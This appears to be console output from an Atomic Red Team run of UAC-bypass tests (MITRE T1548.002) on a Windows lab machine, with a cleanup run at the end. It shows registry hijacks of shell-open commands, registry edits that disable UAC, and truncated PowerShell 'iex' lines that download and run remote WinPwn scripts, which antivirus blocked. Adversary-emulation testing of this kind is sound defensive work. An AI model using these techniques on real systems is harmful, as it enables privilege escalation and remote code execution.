Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                                  Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open                                                             Name                           Property                                                                                 ----                           --------                                                                                 command                                                                                                                 Exit code: 0                                                                                                            Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                             Executing test: T1548.002-3 Bypass UAC using Fodhelper                                                                  Exception calling "Start" with "0" argument(s): "Access is denied"                                                      At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17
+                 $process.Start() > $null
+                 ~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception                                                                                                                                                                                                    Exit code:                                                                                                              Done executing test: T1548.002-3 Bypass UAC using Fodhelper                                                             Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                                     Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                         Name                           Property                                                                                 ----                           --------                                                                                 command                                                                                                                 DelegateExecute :                                                                                                       PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open         PSChildName     : command                                                                                               PSDrive         : HKCU                                                                                                  PSProvider      : Microsoft.PowerShell.Core\Registry
Exit code: 0
Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                         Name                           Property                                                                                 ----                           --------                                                                                 command                                                                                                                 DelegateExecute :                                                                                                       PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open         PSChildName     : command                                                                                               PSDrive         : HKCU                                                                                                  PSProvider      : Microsoft.PowerShell.Core\Registry                                                                    Exit code: 0                                                                                                            Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                         Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                   1 file(s) copied.                                                                                                       symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe                                    Exit code: 0                                                                                                            Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                              Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                      Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open                                                              Name                           Property                                                                                 ----                           --------                                                                                 command                        (default) : cmd.exe /c notepad.exe                                                       DelegateExecute :                                                                                                       PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command      PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open              PSChildName     : command                                                                                               PSDrive         : HKCU                                                                                                  PSProvider      : Microsoft.PowerShell.Core\Registry                                                                    Start-Process : This command cannot be run due to the error: The system cannot find the file specified.                 At line:3 char:1                                                                                                        + Start-Process -FilePath $env:windir\system32\sdclt.exe                                                                + ~~~~~~~~~~~~~~~~~~                                                                    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException                              + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand               Exit code: 0                                                                                                            Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                 Executing test: T1548.002-8 Disable UAC using reg.exe                                                                   The operation completed successfully.                                                                                   Exit code: 0                                                                                                            Done executing test: T1548.002-8 Disable UAC using reg.exe                                                              Executing test: T1548.002-9 Bypass UAC using SilentCleanup task                                                         The screen cannot be set to the number of lines and columns specified.                                                  The operation completed successfully.                                                                                   Access is denied.                                                                                                       Exit code: 0                                                                                                            Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task                                                    Executing test: T1548.002-10 UACME Bypass Method 23                                                                     Exit code: 1073741845                                                                                                   Done executing test: T1548.002-10 UACME Bypass Method 23                                                                Executing test: T1548.002-11 UACME Bypass Method 31
Exit code: 1073741845
Done executing test: T1548.002-11 UACME Bypass Method 31
Executing test: T1548.002-12 UACME Bypass Method 33
Exit code: 1073741845
Done executing test: T1548.002-12 UACME Bypass Method 33
Executing test: T1548.002-13 UACME Bypass Method 34
Exit code: 1073741845
Done executing test: T1548.002-13 UACME Bypass Method 34
Executing test: T1548.002-14 UACME Bypass Method 39
Exit code: 1073741845
Done executing test: T1548.002-14 UACME Bypass Method 39                                                                Executing test: T1548.002-15 UACME Bypass Method 56                                                                     Exit code: 1073741845                                                                                                   Done executing test: T1548.002-15 UACME Bypass Method 56                                                                Executing test: T1548.002-16 UACME Bypass Method 59                                                                     Exit code: 1073741845                                                                                                   Done executing test: T1548.002-16 UACME Bypass Method 59                                                                Executing test: T1548.002-17 UACME Bypass Method 61                                                                     Exit code: 1073741845                                                                                                   Done executing test: T1548.002-17 UACME Bypass Method 61
Executing test: T1548.002-18 WinPwn - UAC Magic
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
                                                                                                                        UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable          At line:3 char:1                                                                                                        + UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...                                             program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.      + ~~~                                                                                                                 + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException                               + FullyQualifiedErrorId : CommandNotFoundException                                                                  Exit code: 0                                                                                                            Done executing test: T1548.002-18 WinPwn - UAC Magic
Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
                                                                                                                        UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable          program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.      At line:3 char:1                                                                                                        + UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -te ...                                             + ~~~                                                                                                                 + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException                               + FullyQualifiedErrorId : CommandNotFoundException                                                                  Exit code: 0                                                                                                            Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...                                             + ~~~~~~~~~~~~~~~~~~~~~~~                                                 This script contains malicious content and has been blocked by your antivirus software.                                 At line:2 char:1                                                                                                        + iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...                                             + ~~~~~~~~~~~~~~~~~~~~~~~                                                     + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException                                          + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand                                                                                                                             UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable          program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.      At line:3 char:1                                                                                                        + UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...                                             + ~~~                                                                                                                 + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException                               + FullyQualifiedErrorId : CommandNotFoundException                                                                  Exit code: 0                                                                                                            Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique                                             Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique                                                iex : At line:1 char:1                                                                                                  + function dccuacbypass                                                                                                 + ~~~~~~~                                                                                                 This script contains malicious content and has been blocked by your antivirus software.                                 At line:1 char:4                                                                                                        + & {iex(new-object net.webclient).downloadstring('https://raw.githubus ...                                             +    ~~~~~~~~~~~~~~~~~~~~~~                                                     + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
Exit code: 0
Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Exit code: 0
Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Exit code: 0
Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Exit code: 0
Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-25 Disable UAC notification via registry keys
Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
2. Invoke-AtomicTest T1548.002 -Cleanup

```
PS C:\Users\vagrant\Downloads> Invoke-AtomicTest T1548.002 -Cleanup                                                     PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                                                  Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                             Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                        Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                      Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                 Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper                                                      Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper                                                 Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                         Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                    Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                  Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                             Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                       Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                  Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                          Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                     Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe                                                       The operation completed successfully.                                                                                   Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe                                                  Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task                                             Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task                                        Executing cleanup for test: T1548.002-10 UACME Bypass Method 23                                                         Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23                                                    Executing cleanup for test: T1548.002-11 UACME Bypass Method 31                                                         Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31                                                    Executing cleanup for test: T1548.002-12 UACME Bypass Method 33                                                         Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33                                                    Executing cleanup for test: T1548.002-13 UACME Bypass Method 34                                                         Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34                                                    Executing cleanup for test: T1548.002-14 UACME Bypass Method 39                                                         Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39                                                    Executing cleanup for test: T1548.002-15 UACME Bypass Method 56                                                         Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56                                                    Executing cleanup for test: T1548.002-16 UACME Bypass Method 59                                                         Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59                                                    Executing cleanup for test: T1548.002-17 UACME Bypass Method 61                                                         Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61                                                    Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic                                                             Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```

![Captura desde 2024-07-25 20-18-55](https://github.com/user-attachments/assets/ff40a9c7-5583-4bd8-9cbb-22571eb60946)
![Captura desde 2024-07-25 20-19-43](https://github.com/user-attachments/assets/7150cf75-2913-443e-92c4-b4f29bca718f)
